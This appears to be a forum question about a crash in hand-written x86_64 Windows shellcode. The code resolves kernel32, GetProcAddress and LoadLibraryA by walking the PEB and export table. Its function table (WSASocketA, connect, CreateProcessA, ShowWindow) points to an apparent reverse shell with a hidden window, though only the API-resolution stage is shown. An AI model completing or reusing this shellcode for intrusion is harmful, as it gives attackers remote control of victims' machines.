I have a code in assembly x86_64 that gets the kernel32.dll base through accessing the PEB and bla bla bla, gets the GetProcAddress address, uses that for getting the LoadLibraryA function and then i use LoadLibraryA function for loading the user32.dll module.
This is the relevant portion of code:
section .text
global _start
_start:
; ###### TABLE ######
; [rdi] = kernel32.dll
; [rdi + 0x8] = GetProcAddress
; [rdi + 0x10] = LoadLibraryA
; [rdi + 0x18] = ws2_32.dll
; [rdi + 0x20] = user32.dll
; [rdi + 0x28] = GetConsoleWindow
; [rdi + 0x30] = ShowWindow
; [rdi + 0x38] = WSAStartup
; [rdi + 0x40] = WSASocketA
; [rdi + 0x48] = connect
; [rdi + 0x50] = CreateProcessA
; [rdi + 0x58] = ExitProcess
; [rdi + 0x60] = socket fd
; ###### TABLE ######
; find the kernel32.dll base address
xor rdx, rdx
mov rax, [gs: rdx + 0x60] ; EAX = PEB
mov rax, [rax + 0x18] ; EAX = PEB->Ldr
mov rsi, [rax + 0x20] ; ESI = PEB->Ldr.InMemoryOrderModuleList
lodsq
xchg rax, rsi
lodsq
mov rbx, [rax + 0x20] ; kernel32 dllbase address, sizeof(_LIST_ENTRY) = 0x10 + 0x20 = 0x30 (0x30 offset for dllbase in _LDR_DATA_TABLE_ENTRY)
; find the export table of kernel32.dll
mov edx, dword [rbx + 0x3c] ; IMAGE_DOS_HEADER->e_lfanew (!! is type LONG !!)
add rdx, rbx ; e_lfanew + dllbase = IMAGE_NT_HEADERS
mov edx, dword [rdx + 0x88] ; export data directory (!! is type DWORD !!)
add rdx, rbx ; offset + dllbase = address export table
mov esi, dword [rdx + 0x20] ; offset addressOfNames
add rsi, rbx ; address of addressOfNames
mov rcx, 0xffffffffffffffff ; RCX = -1
; get the GetProcAddress function name
Get_FunctionName:
inc rcx ; index
lodsd ; load offset of the function name into rax
add rax, rbx ; get address of the function name
cmp dword [rax], 0x50746547 ; GetP
jnz Get_FunctionName
cmp dword [rax + 0x4], 0x41636f72 ; rocA
jnz Get_FunctionName
cmp dword [rax + 0x8], 0x65726464 ; ddre
jnz Get_FunctionName
; now rax contains the address to the string 'GetProcAddress'
; find the address of GetProcAddress
mov esi, dword [rdx + 0x24] ; RSI = Offset of addressOfNamesOrdinal
add rsi, rbx ; RSI = Address of addressOfNamesOrdinal
mov cx, [rsi + rcx * 2] ; CX = ordinal ( we multiply by 2 because addressOfnamesOrdinal is a list of WORDS )
mov esi, dword [rdx + 0x1c] ; RSI = offset of addressOfFunctions
add rsi, rbx ; RSI = address of addressOfFunctions
mov edx, dword [rsi + rcx * 4] ; RDX = offset of GetProcAddress address
add rdx, rbx ; RDX = addres of GetProcAddress
sub rsp, 0x70 ; make space in the stack. Important to be aware of the 16 byte alignment
lea rdi, [rsp] ; RDI = Resolved addresses table
mov [rdi], rbx ; kernel32.dll
mov [rdi+0x8], rdx ; GetProcAddress
sub rsp, 0x10
mov r10, 0x7262694c64616f4c
mov qword [rsp], r10 ; LoadLibr
mov r10, 0x0000000041797261
mov qword [rsp+8], r10 ; aryA
sub rsp, 0x28 ; Reserve 32 bytes shadow space
mov rax, rdx
lea rdx, [rsp+0x28] ; LoadLibraryA string
mov rcx, [rdi] ; base address of kernel32
call rax ; Call GetProcAddress
add rsp, 0x38 ; restore stack, shadow space (32 bytes) + "LoadLibraryA"
; now rax con/tains the address of LoadLibraryA
mov [rdi + 0x10], rax
; Load user32.dll using LoadLibraryA
sub rsp, 0x10
mov r10, 0x642E323372657375
mov qword [rsp], r10
mov r10, 0x0000000000006C6C
mov qword [rsp+0x8], r10
sub rsp, 0x28 ; shadow space
lea rcx, [rsp+0x28] ; string user32.dll
mov rax, [rdi + 0x10] ; address of LoadLibraryA
call rax
add rsp, 0x38
; now rax contains the address of user32.dll
mov [rdi + 0x20], rax
I'm not pro but I really focused in following the ABI and the windows x64 calling convention.
A interesting thing that I saw is that in this post looks like the person asking the question had the same error like me, but he answered his own question and his problem was that he didn't have the 16 byte alignment in the stack before calling LoadLibraryA. Not my case (I think).
I compiled with mingw like this: x86_64-w64-mingw32-gcc customshell_x64.obj -o shell_x86_64.exe -nostdlib -Wl,--entry=_start
And using x64dbg on the binary I see that once I call the LoadLibraryA function I get to a x64dbg breakpoint in the TLS Callback for gdifull32.dll, if I continue execution I'll get a EXCEPTION_ACCESS_VIOLATION somewhere.
I'm not used to using a debugger and, honestly, don't know exactly what I need to look for being able to understand what is going on here.
Also, I actually used LoadLibraryA for loading "ws2_32.dll" and works with no problem.
sub rsp,* add rsp,*around every function call. better do this once in prolog and epilog. and main here not need use asm at all. possible write shellcode complete on c++, which will be more easy